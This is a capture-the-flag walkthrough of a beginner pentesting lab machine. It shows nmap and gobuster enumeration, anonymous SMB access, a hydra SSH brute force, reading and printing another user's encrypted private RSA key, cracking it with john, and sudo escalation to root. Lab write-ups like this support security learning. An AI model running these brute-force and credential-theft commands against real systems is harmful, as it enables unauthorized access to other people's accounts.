1. Deploy the machine and connect to our network.
2. Find the services exposed by the machine
root@ip-10-10-141-237:~# nmap 10.10.4.205 Starting Nmap 7.60 ( https://nmap.org ) at 2020-11-26 12:47 GMT Nmap scan report for ip-10-10-4-205.eu-west-1.compute.internal (10.10.4.205) Host is up (0.0013s latency). Not shown: 994 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds 8009/tcp open ajp13 8080/tcp open http-proxy MAC Address: 02:80:3B:1E:CD:4F (Unknown) Nmap done: 1 IP address (1 host up) scanned in 1.69 seconds
3. What is the name of the hidden directory on the web server(enter name without /)?
root@ip-10-10-141-237:~# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -u http://10.10.4.205 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.4.205 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/11/26 12:51:39 Starting gobuster =============================================================== /development (Status: 301) =============================================================== 2020/11/26 12:51:51 Finished ===============================================================
:heavy_check_mark: The hidden directory is
The directory it self doesn’t contain anything valuable to use it looks like.
4. Use brute-forcing to find the username & password
5. What is the username?
From the service scan earlier we see that samba is running. Let’s see what we can see there.
root@ip-10-10-141-237:~# smbclient -L \\\\10.10.4.205 --no-pass WARNING: The "syslog" option is deprecated Sharename Type Comment --------- ---- ------- Anonymous Disk IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP BASIC2
We have a
Anonymous share. Lets see if there is anything in it.
root@ip-10-10-141-237:~# smbclient \\\\10.10.4.205\\Anonymous --no-pass WARNING: The "syslog" option is deprecated Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Apr 19 18:31:20 2018 .. D 0 Thu Apr 19 18:13:06 2018 staff.txt N 173 Thu Apr 19 18:29:55 2018 14318640 blocks of size 1024. 11079768 blocks available smb: \> get staff.txt getting file \staff.txt of size 173 as staff.txt (84.5 KiloBytes/sec) (average 84.5 KiloBytes/sec)
The file staff.txt file content is a message to all staff from one of the staff members, named
And he mentions another person called
root@ip-10-10-141-237:~# cat staff.txt Announcement to staff: PLEASE do not upload non-work-related items to this share. I know it's all in fun, but this is how mistakes happen. (This means you too, Jan!) -Kay
So a wild guess is that one of these names are the username asked for.
jan was accepted as the correct answer.
6. What is the password?
So we know
jan is the username, now let’s use SSH (which we saw was running the the service scan)
hydra to see if we can bruteforce the password. We’re using the
rockyou.txt password list.
root@ip-10-10-141-237:~# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.4.205 -t 4 ssh Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2020-11-26 12:26:42 [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task [DATA] attacking ssh://10.10.4.205:22/ [STATUS] 64.00 tries/min, 64 tries in 00:01h, 14344334 to do in 3735:31h, 4 active [STATUS] 55.67 tries/min, 167 tries in 00:03h, 14344231 to do in 4294:41h, 4 active [STATUS] 57.71 tries/min, 404 tries in 00:07h, 14343994 to do in 4142:15h, 4 active [ssh] host: 10.10.4.205 login: jan password: armando
:heavy_check_mark: We got a match!
armando is the password.
7. What service do you use to access the server(answer in abbreviation in all caps)?
SSH of course, we just used to to bruteforce the password.
8. Enumerate the machine to find any vectors for privilege escalation
linpeas.sh is a nice script to run to get a quick overview of stuff.
One of the things linpeas found is that kay has left this private ssh key open.
We really should have been able to manually check this immediately on our first look around the system, lesson learned till next time! :smiley:
jan@basic2:/dev/shm$ cat /home/kay/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75 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 -----END RSA PRIVATE KEY-----
9. What is the name of the other user you found(all lower case)?
A wild guess here too, that the other name from the
staff.txt file is the username.
:heavy_check_mark: Which it is:
(We could also find this by login in as
jan through ssh and look around, but I took it from the
10. If you have found another user, what can you do with this information?
We could see if we can gain access to
kays account with the help of using his exposed private ssh key…
ssh -i kay.id_rsa [email protected]
But wait! It looks like the private key has a password on it!
Let’s try to bruteforce it with the help of
First we need to get the hash of it, we do that with the help of
root@ip-10-10-141-237:~# python /opt/john/ssh2john.py kay.id_rsa > kay.id_rsa.hash
Then let’s use
john and the
rockyou.txt password list to see if we can bruteforce the password!
root@ip-10-10-141-237:~# john --wordlist=/usr/share/wordlists/rockyou.txt kay.id_rsa.hash Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl" Use the "--format=ssh-opencl" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status beeswax (kay.id_rsa) 1g 0:00:00:11 DONE (2020-11-27 13:38) 0.08481g/s 1216Kp/s 1216Kc/s 1216KC/s *7¡Vamos!
:heavy_check_mark: BOOM! Password found.
11. What is the final password you obtain?
Now that we have the private key password, we can log in as
From earlier enumeration as the user
jan I remembered that there was a
pass.bak file in
kay’s home directory.
Let’s take a peak what it contains.
kay@basic2:~$ cat pass.bak heresareallystrongpasswordthatfollowsthepasswordpolicy$$
:heavy_check_mark: A password! Perfect!
What else we see in
kay’s home directory is that there is a file called
.sudo_as_admin_successful which indicates that
kay most likely can use
sudo to gain root. And hopefully the password in the
pass.bak file is his current password.
Let’s try! (We could also check with
kay@basic2:~$ sudo su [sudo] password for kay: root@basic2:/home/kay#
Just out of curiosity, let’s see what’s in the
root@basic2:/home/kay# ls /root/ .bash_history .bashrc flag.txt .nano/ .profile root@basic2:/home/kay# cat /root/flag.txt Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain a shell, and two ways to privesc. I encourage you to find them all! If you're in the target audience (newcomers to pentesting), I hope you learned something. A few takeaways from this challenge should be that every little bit of information you can find can be valuable, but sometimes you'll need to find several different pieces of information and combine them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding an obviously outdated, vulnerable service right away with a port scan (unlike the first entry in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and therefore might've been overlooked by administrators. Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send me a link! I can be reached at [email protected]. If you've got questions or feedback, please reach out to me. Happy hacking!
Hang on there! More then one way to do this box? What other ways might there be?! I have to check this out in the future :smiley: